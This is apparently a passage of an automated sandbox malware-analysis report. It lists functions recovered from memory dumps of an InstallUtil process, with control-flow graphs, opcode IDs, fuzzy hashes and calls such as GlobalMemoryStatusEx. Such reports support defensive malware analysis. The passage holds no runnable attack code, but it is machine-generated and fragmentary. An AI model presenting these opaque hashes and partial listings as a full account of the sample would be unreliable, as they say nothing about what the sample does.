                                                                          • Instruction ID: b3986b0cfe81ddf64eaab5b2699f24155af4aa923cd7645c40b92386a336fc5e
                                                                          • Opcode Fuzzy Hash: 9f6b1aab75204ba2cae6b1bfdf37daf326a5711c8db8696842b897de844bb215
                                                                          • Instruction Fuzzy Hash: D732A034A042458FDB14DF69D884BADBBB2FF88320F14856AE905EB395DBB0DC45DB60
                                                                          Function 05E1DCF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 130COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: a6c8fc9829bcd4664782c62e3e28695e53cf9ab0e6571aa3b60c02962beaaf3c
                                                                          • Instruction ID: 18a529cce7a29553a597767dc1a971cdbb7952e5b57853eb3739adf9db2a9843
                                                                          • Opcode Fuzzy Hash: a6c8fc9829bcd4664782c62e3e28695e53cf9ab0e6571aa3b60c02962beaaf3c
                                                                          • Instruction Fuzzy Hash: BE41DFB2E0475A8FDB04CFA9D8407AEBBF5AF89310F14866AD844A7241DB749845CBD4
                                                                          Function 05E1D0E8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 27 5e1d0e8-5e1de44 GlobalMemoryStatusEx 31 5e1de46-5e1de4c 27->31 32 5e1de4d-5e1de75 27->32 31->32
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E1DD4A), ref: 05E1DE37
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID: y7$B
                                                                          • API String ID: 1890195054-2137850373
                                                                          • Opcode ID: 7a4871bb324f517d6dabc206f17d7afc047040fbb0d3b789e64bcf42e3b535dc
                                                                          • Instruction ID: a9fcaff8266ebb11cbcb39e6f63f3cb7636bec4e934ae71ca99ee8e1a88dbde0
                                                                          • Opcode Fuzzy Hash: 7a4871bb324f517d6dabc206f17d7afc047040fbb0d3b789e64bcf42e3b535dc
                                                                          • Instruction Fuzzy Hash: 3A11F4B1C006599BDB10CF9AC944B9EFBF4BB48220F10816AD918A7240D778A954CFA5
                                                                          Function 05E1DDC8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 35 5e1ddc8-5e1ddca 36 5e1ddd1-5e1de0e 35->36 37 5e1ddcc 35->37 38 5e1de16-5e1de44 GlobalMemoryStatusEx 36->38 37->36 39 5e1de46-5e1de4c 38->39 40 5e1de4d-5e1de75 38->40 39->40
                                                                          APIs
                                                                          • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05E1DD4A), ref: 05E1DE37
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3440787115.0000000005E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E10000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_5e10000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID: GlobalMemoryStatus
                                                                          • String ID: y7$B
                                                                          • API String ID: 1890195054-2137850373
                                                                          • Opcode ID: 1d21493704c64a62e9d8cfa803a1e2ba34fe36b9dfaf8a7abaa686a84b51d807
                                                                          • Instruction ID: 477064d99aa4334c408691509e9aef811e84128395b10d1d974c84a9533fba6b
                                                                          • Opcode Fuzzy Hash: 1d21493704c64a62e9d8cfa803a1e2ba34fe36b9dfaf8a7abaa686a84b51d807
                                                                          • Instruction Fuzzy Hash: 1D1144B1C0065ADFDB10CF9AC944BDEFBB4BF48320F10826AD818A7240D778A940CFA5
                                                                          Function 00FE4A3D Relevance: 2.8, Strings: 2, Instructions: 264COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 652 fe4a3d-fe4a46 653 fe4a4c-fe4aae 652->653 654 fe4a48-fe4a4b 652->654 656 fe4af8-fe4afa 653->656 657 fe4ab0-fe4abb 653->657 654->653 659 fe4afc-fe4b15 656->659 657->656 658 fe4abd-fe4ac9 657->658 660 fe4aec-fe4af6 658->660 661 fe4acb-fe4ad5 658->661 666 fe4b17-fe4b23 659->666 667 fe4b61-fe4b63 659->667 660->659 662 fe4ad9-fe4ae8 661->662 663 fe4ad7 661->663 662->662 665 fe4aea 662->665 663->662 665->660 666->667 669 fe4b25-fe4b31 666->669 668 fe4b65-fe4b7d 667->668 676 fe4b7f-fe4b8a 668->676 677 fe4bc7-fe4bc9 668->677 670 fe4b54-fe4b5f 669->670 671 fe4b33-fe4b3d 669->671 670->668 673 fe4b3f 671->673 674 fe4b41-fe4b50 671->674 673->674 674->674 675 fe4b52 674->675 675->670 676->677 678 fe4b8c-fe4b98 676->678 679 fe4bcb-fe4be3 677->679 680 fe4b9a-fe4ba4 678->680 681 fe4bbb-fe4bc5 678->681 685 fe4c2d-fe4c2f 679->685 686 fe4be5-fe4bf0 679->686 683 fe4ba8-fe4bb7 680->683 684 fe4ba6 680->684 681->679 683->683 687 fe4bb9 683->687 684->683 689 fe4c31-fe4c67 685->689 686->685 688 fe4bf2-fe4bfe 686->688 687->681 690 fe4c00-fe4c0a 688->690 691 fe4c21-fe4c2b 688->691 697 fe4c6f-fe4ca4 689->697 692 fe4c0e-fe4c1d 690->692 693 fe4c0c 690->693 691->689 692->692 695 fe4c1f 692->695 693->692 695->691 698 fe4caa-fe4cb8 697->698 699 fe4cba-fe4cc0 698->699 700 fe4cc1-fe4d21 698->700 699->700 707 fe4d23-fe4d27 700->707 708 fe4d31-fe4d35 700->708 707->708 709 fe4d29 707->709 710 fe4d37-fe4d3b 708->710 711 fe4d45-fe4d49 708->711 709->708 710->711 712 fe4d3d 710->712 713 fe4d4b-fe4d4f 711->713 714 fe4d59-fe4d5d 711->714 712->711 713->714 715 fe4d51 713->715 716 fe4d5f-fe4d63 714->716 717 fe4d6d-fe4d71 714->717 715->714 716->717 718 fe4d65 716->718 719 fe4d73-fe4d77 717->719 720 fe4d81-fe4d85 717->720 718->717 719->720 721 fe4d79-fe4d7c call fe0ab8 719->721 722 fe4d87-fe4d8b 720->722 723 fe4d95 720->723 721->720 722->723 725 fe4d8d-fe4d90 call fe0ab8 722->725 727 fe4d96 723->727 725->723 727->727
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 4b3a6681998fc2d5d56d5218370018281cd47e63c4d2ebd8e485476b820acb53
                                                                          • Instruction ID: 4a28c0a0fc791c7d38878e729b304e638a179ccd3b2d4b6f51d9cc99b2093e15
                                                                          • Opcode Fuzzy Hash: 4b3a6681998fc2d5d56d5218370018281cd47e63c4d2ebd8e485476b820acb53
                                                                          • Instruction Fuzzy Hash: 9DB15F70E00649CFDB20CFAAD88579DBBF1BF88724F24812DD815E7254EB74A845DB91
                                                                          Function 00FE3E25 Relevance: 2.7, Strings: 2, Instructions: 236COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 794 fe3e25-fe3e96 796 fe3e98-fe3ea3 794->796 797 fe3ee0-fe3ee2 794->797 796->797 799 fe3ea5-fe3eb1 796->799 798 fe3ee4-fe3f3c 797->798 808 fe3f3e-fe3f49 798->808 809 fe3f86-fe3f88 798->809 800 fe3ed4-fe3ede 799->800 801 fe3eb3-fe3ebd 799->801 800->798 803 fe3ebf 801->803 804 fe3ec1-fe3ed0 801->804 803->804 804->804 805 fe3ed2 804->805 805->800 808->809 811 fe3f4b-fe3f57 808->811 810 fe3f8a-fe3fa2 809->810 817 fe3fec-fe3fee 810->817 818 fe3fa4-fe3faf 810->818 812 fe3f7a-fe3f84 811->812 813 fe3f59-fe3f63 811->813 812->810 815 fe3f67-fe3f76 813->815 816 fe3f65 813->816 815->815 819 fe3f78 815->819 816->815 821 fe3ff0-fe4002 817->821 818->817 820 fe3fb1-fe3fbd 818->820 819->812 822 fe3fbf-fe3fc9 820->822 823 fe3fe0-fe3fea 820->823 828 fe4009-fe403e 821->828 824 fe3fcd-fe3fdc 822->824 825 fe3fcb 822->825 823->821 824->824 827 fe3fde 824->827 825->824 827->823 829 fe4044-fe4052 828->829 830 fe405b-fe40bb 829->830 831 fe4054-fe405a 829->831 838 fe40bd-fe40c1 830->838 839 fe40cb-fe40cf 830->839 831->830 838->839 840 fe40c3 838->840 841 fe40df-fe40e3 839->841 842 fe40d1-fe40d5 839->842 840->839 844 fe40e5-fe40e9 841->844 845 fe40f3-fe40f7 841->845 842->841 843 fe40d7-fe40da call fe0ab8 842->843 843->841 844->845 849 fe40eb-fe40ee call fe0ab8 844->849 846 fe40f9-fe40fd 845->846 847 fe4107-fe410b 845->847 846->847 850 fe40ff-fe4102 call fe0ab8 846->850 851 fe410d-fe4111 847->851 852 fe411b-fe411f 847->852 849->845 850->847 851->852 855 fe4113 851->855 856 fe412f 852->856 857 fe4121-fe4125 852->857 855->852 859 fe4130 856->859 857->856 858 fe4127 857->858 858->856 859->859
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 96f76b293fcb10099f5dcdd4494e854b515aa6dbfa46040a98aaa44da6b6ecf7
                                                                          • Instruction ID: 35460584185a55f8d9d48484068ebb3d8652dafd454ae89391779c7d00996759
                                                                          • Opcode Fuzzy Hash: 96f76b293fcb10099f5dcdd4494e854b515aa6dbfa46040a98aaa44da6b6ecf7
                                                                          • Instruction Fuzzy Hash: 8C916C70E00289CFDF14CFAAC9897DEBBF2AF88714F148129E405A7254DB74A985DB81
                                                                          Function 00FE27F4 Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 860 fe27f4-fe27f8 861 fe277c-fe27c6 860->861 862 fe27fa 860->862 876 fe27c8 861->876 877 fe27d0 861->877 863 fe27fc-fe27fe 862->863 864 fe2800-fe2803 862->864 863->864 866 fe2804-fe2857 863->866 864->866 870 fe285f-fe28bc 866->870 871 fe2859-fe285c 866->871 880 fe28be-fe28c4 870->880 881 fe28c5-fe2905 870->881 871->870 876->877 879 fe27d1 877->879 879->879 880->881 886 fe290f 881->886 887 fe2907 881->887 888 fe2910 886->888 887->886 888->888
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: e72db7db118fc30d20294f63c75033f5e71c851c9a366559ccfb05cbdd48731d
                                                                          • Instruction ID: c3822c511c57c01e24b92e72789c4b5b60cea8a4c00e1fb8f374ba1bad386147
                                                                          • Opcode Fuzzy Hash: e72db7db118fc30d20294f63c75033f5e71c851c9a366559ccfb05cbdd48731d
                                                                          • Instruction Fuzzy Hash: 48715670D0038DDFDB10CF9AC584ADEBBB5EF48314F20801AE409AB254EB75A945DF91
                                                                          Function 00FE6C8D Relevance: 2.6, Strings: 2, Instructions: 137COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 889 fe6c8d-fe6c96 890 fe6c9c-fe6cf7 889->890 891 fe6c98-fe6c9b 889->891 892 fe6cf9-fe6d24 890->892 893 fe6d62-fe6d66 890->893 891->890 899 fe6d26-fe6d28 892->899 900 fe6d54 892->900 894 fe6d68-fe6d8b 893->894 895 fe6d91-fe6d9c 893->895 894->895 897 fe6d9e-fe6da6 895->897 898 fe6da8-fe6dcf 895->898 897->898 904 fe6dd5-fe6de3 898->904 902 fe6d4a-fe6d52 899->902 903 fe6d2a-fe6d34 899->903 909 fe6d59-fe6d5c 900->909 902->909 905 fe6d38-fe6d46 903->905 906 fe6d36 903->906 907 fe6dec-fe6e02 904->907 908 fe6de5-fe6deb 904->908 905->905 911 fe6d48 905->911 906->905 912 fe6e18-fe6e3f 907->912 913 fe6e04-fe6e10 907->913 908->907 909->893 911->902 917 fe6e4f 912->917 918 fe6e41-fe6e45 912->918 913->912 921 fe6e50 917->921 918->917 919 fe6e47-fe6e4a call fe0a00 918->919 919->917 921->921
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: 34ec21ad4a5e9b39bd591223e007e5381b92c7b7f446c4a95020847017d45670
                                                                          • Instruction ID: c72ff7bf161cbc2ee505d850984e559b58bdc6e897a080d336da536c6094a326
                                                                          • Opcode Fuzzy Hash: 34ec21ad4a5e9b39bd591223e007e5381b92c7b7f446c4a95020847017d45670
                                                                          • Instruction Fuzzy Hash: B9512675E002588FDB18CFAAC845BDDBBB1BF48320F54811AE815BB391D774A844CF54
                                                                          Function 00FE6C98 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 922 fe6c98-fe6cf7 924 fe6cf9-fe6d24 922->924 925 fe6d62-fe6d66 922->925 931 fe6d26-fe6d28 924->931 932 fe6d54 924->932 926 fe6d68-fe6d8b 925->926 927 fe6d91-fe6d9c 925->927 926->927 929 fe6d9e-fe6da6 927->929 930 fe6da8-fe6dcf 927->930 929->930 936 fe6dd5-fe6de3 930->936 934 fe6d4a-fe6d52 931->934 935 fe6d2a-fe6d34 931->935 941 fe6d59-fe6d5c 932->941 934->941 937 fe6d38-fe6d46 935->937 938 fe6d36 935->938 939 fe6dec-fe6e02 936->939 940 fe6de5-fe6deb 936->940 937->937 943 fe6d48 937->943 938->937 944 fe6e18-fe6e3f 939->944 945 fe6e04-fe6e10 939->945 940->939 941->925 943->934 949 fe6e4f 944->949 950 fe6e41-fe6e45 944->950 945->944 953 fe6e50 949->953 950->949 951 fe6e47-fe6e4a call fe0a00 950->951 951->949 953->953
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B$y7$B
                                                                          • API String ID: 0-638310769
                                                                          • Opcode ID: db2a7391614a022061d38adffa297bf4ea4fbc08c9be3b1d3798081a6ac2df14
                                                                          • Instruction ID: 364f21ae09d63229271c09252c06615446831d457d66e5bf0a8f58a8caceac64
                                                                          • Opcode Fuzzy Hash: db2a7391614a022061d38adffa297bf4ea4fbc08c9be3b1d3798081a6ac2df14
                                                                          • Instruction Fuzzy Hash: 65511675E002588FDB28CFAAC844B9DFBB1BF48310F54851AE815BB391DB74A844DF95
                                                                          Function 00FE268D Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1568 fe268d-fe2692 1569 fe2698-fe269b 1568->1569 1570 fe2694-fe2696 1568->1570 1571 fe269c-fe26f5 1569->1571 1570->1569 1570->1571 1574 fe26fd-fe2708 1571->1574 1575 fe26f7-fe26fa 1571->1575 1576 fe2710-fe2726 1574->1576 1575->1574 1577 fe272d-fe2755 1576->1577 1578 fe275b-fe2769 1577->1578 1579 fe276b-fe2771 1578->1579 1580 fe2772-fe27c6 1578->1580 1579->1580 1587 fe27c8 1580->1587 1588 fe27d0 1580->1588 1587->1588 1589 fe27d1 1588->1589 1589->1589
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: ac5116f441a92cf1bb73ec468f653707c9d4f240d210ee5f80840910b84a4011
                                                                          • Instruction ID: c31c5ecaf668882fd42965771ca7972d4d2e6c10c0251e736932cf381d2a96fc
                                                                          • Opcode Fuzzy Hash: ac5116f441a92cf1bb73ec468f653707c9d4f240d210ee5f80840910b84a4011
                                                                          • Instruction Fuzzy Hash: B641FFB0D0034DDFDB10DFAAC980ADEBBB5EF48310F208029E419AB254EB75A945CB91
                                                                          Function 00FE2698 Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1590 fe2698-fe26f5 1594 fe26fd-fe2755 1590->1594 1595 fe26f7-fe26fa 1590->1595 1598 fe275b-fe2769 1594->1598 1595->1594 1599 fe276b-fe2771 1598->1599 1600 fe2772-fe27c6 1598->1600 1599->1600 1607 fe27c8 1600->1607 1608 fe27d0 1600->1608 1607->1608 1609 fe27d1 1608->1609 1609->1609
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: y7$B
                                                                          • API String ID: 0-2137850373
                                                                          • Opcode ID: 6bc9ace6079d20e7c96c0be95062570fc6553e6b05db0791f1b1f188a1eb28e4
                                                                          • Instruction ID: 738e182a9bbd48e43b0638e036ea2c695d77a24568d1462cd156934e3c91f903
                                                                          • Opcode Fuzzy Hash: 6bc9ace6079d20e7c96c0be95062570fc6553e6b05db0791f1b1f188a1eb28e4
                                                                          • Instruction Fuzzy Hash: 4F41C0B1D00349DFDB10DFAAC584A9EBBB5EF48310F248029E419AB254DB75A945CB91
                                                                          Function 00FE78CB Relevance: .6, Instructions: 555COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1d0a34ee92c5bf087ca5c50aa92f2463acf0f53a5a8378d2be6d1c3cbabae56e
                                                                          • Instruction ID: ea2346b1892978fbd5dce31dc301c8370a1d41dcab63bf78447f2c5511d654db
                                                                          • Opcode Fuzzy Hash: 1d0a34ee92c5bf087ca5c50aa92f2463acf0f53a5a8378d2be6d1c3cbabae56e
                                                                          • Instruction Fuzzy Hash: 8A128130700202CBDB29A739E44422C77E3FBC9355B149A6EE405DB365DFBAED869781
                                                                          Function 00FE9324 Relevance: .2, Instructions: 247COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e6b808792e7a1e6e981febc45991ebb44698db48ac090e75a74834e3f9eaf871
                                                                          • Instruction ID: dfb1ec6e9923511c66ae9f17962e111a7235b02ff17d28da1bdafc0ae915146c
                                                                          • Opcode Fuzzy Hash: e6b808792e7a1e6e981febc45991ebb44698db48ac090e75a74834e3f9eaf871
                                                                          • Instruction Fuzzy Hash: 9D91C134A04244CFDB15DF65D584AADBBF2EF88320F24846AE805E7395DB70EC46DB60
                                                                          Function 00FEF29D Relevance: .1, Instructions: 113COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 5866a9064d789bd3f6cdcd07d8bd02cb33a207564ef199b2188afc39983902b5
                                                                          • Instruction ID: a6c37aaa079ba3a75e28b1cc65db45859a45f01396db9f0a63fdfd66ceaa8979
                                                                          • Opcode Fuzzy Hash: 5866a9064d789bd3f6cdcd07d8bd02cb33a207564ef199b2188afc39983902b5
                                                                          • Instruction Fuzzy Hash: 0941FD31B002858FCB19AB35C45476E7BA2AF89720B2444B9D406DB396EF35CD0ADBD2
                                                                          Function 00FE1128 Relevance: .1, Instructions: 109COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cacd77deecf0baac5c9b8e35d541890998fb88a4a7702c426d7a603691992bf0
                                                                          • Instruction ID: cf0d026b09081c9b1cec569b7ee4b66fae7503d9ac390aa70b2b89ab5d274e5d
                                                                          • Opcode Fuzzy Hash: cacd77deecf0baac5c9b8e35d541890998fb88a4a7702c426d7a603691992bf0
                                                                          • Instruction Fuzzy Hash: 1251DA75215A82CFD70AEF28FC899553FA3FBD230670159EDD1006B27BDBA0A905DB81
                                                                          Function 00FEF2B0 Relevance: .1, Instructions: 105COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 454e108d726dd79e399065ee4f59cbb81d744bc7625c2b21c48b1d5e71d1a1f3
                                                                          • Instruction ID: 69f013c7ca98f6cf72c0d6b428879a9ad702cae290d44b81d9c91292abf88c10
                                                                          • Opcode Fuzzy Hash: 454e108d726dd79e399065ee4f59cbb81d744bc7625c2b21c48b1d5e71d1a1f3
                                                                          • Instruction Fuzzy Hash: 8731EB31B0024A8FCB18AB36C45466E7BA3ABC9710B244479D406DB396EE32DC06CBD2
                                                                          Function 00FE6F1B Relevance: .1, Instructions: 103COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de91d367333c01637c6047ce86112d1ca9c2ccd153fe1ee0b3bf5decc242d20b
                                                                          • Instruction ID: 48f66d178f942f3c75a1dbc476dfab6ece957cc5e6b3cbf6dc6ef12981ab4726
                                                                          • Opcode Fuzzy Hash: de91d367333c01637c6047ce86112d1ca9c2ccd153fe1ee0b3bf5decc242d20b
                                                                          • Instruction Fuzzy Hash: 9D318130E0029D9BDB24DFA6E4447AEB7B2EF95350F208529E501FB290EB71ED419B91
                                                                          Function 00FEF164 Relevance: .1, Instructions: 98COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0836e20a3d643f13182b96f7ce6c464db7fc4ff547ec8d0576418f726caa0276
                                                                          • Instruction ID: c02f3d72a5069266686b27870c4f82623c77274e1f8b46502c7bf184803047bb
                                                                          • Opcode Fuzzy Hash: 0836e20a3d643f13182b96f7ce6c464db7fc4ff547ec8d0576418f726caa0276
                                                                          • Instruction Fuzzy Hash: 35316135E10649DBDB15CFA5C89469EBBB6BF89310F10C529E806E7350EF70AC45DB90
                                                                          Function 00FE1138 Relevance: .1, Instructions: 97COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc82b88a0daa336ea1df7741d08e82ce890f3733a9be57cbed735352c07fa015
                                                                          • Instruction ID: 4adc3538d7675dbe23d4bdaaca554b39d1a027841cceb81f7e544ca09478da19
                                                                          • Opcode Fuzzy Hash: dc82b88a0daa336ea1df7741d08e82ce890f3733a9be57cbed735352c07fa015
                                                                          • Instruction Fuzzy Hash: DB41A975215986CFD70AFF28F8889553FA3FBD130670069EDD1046B27ADFA0A905DB81
                                                                          Function 00FE6F28 Relevance: .1, Instructions: 95COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 313b4aad4f6a043b94a8e5f393ee04019e789018aa858008766dfe437a1b7caf
                                                                          • Instruction ID: d7764dfadbdb7921611d746698d0655be45e1501c9de687e5feafa1a86dfb7bb
                                                                          • Opcode Fuzzy Hash: 313b4aad4f6a043b94a8e5f393ee04019e789018aa858008766dfe437a1b7caf
                                                                          • Instruction Fuzzy Hash: 99319030E002898BDB14DFA6E45479EB7B2FF95350F208525E502FB240EB71ED81DB91
                                                                          Function 00FEF170 Relevance: .1, Instructions: 91COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000006.00000002.3429955902.0000000000FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_6_2_fe0000_InstallUtil.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4728690ab65fc1be168bfe1c25673b5497ad717d2b827a9b5dfbd51314958d38
                                                                          • Instruction ID: 30064d7574faa15970c6831c099386b7b6109c5d89a0d854bdd2f031de707b3f
                                                                          • Opcode Fuzzy Hash: 4728690ab65fc1be168bfe1c25673b5497ad717d2b827a9b5dfbd51314958d38
                                                                          • Instruction Fuzzy Hash: 41315C35E1064ADBDB19CFA5D89469EBBB2BF89310F10C529E806E7350EF70AC45CB50
                                                                          Function 00FE132F Relevance: .1, Instructions: 87COMMON
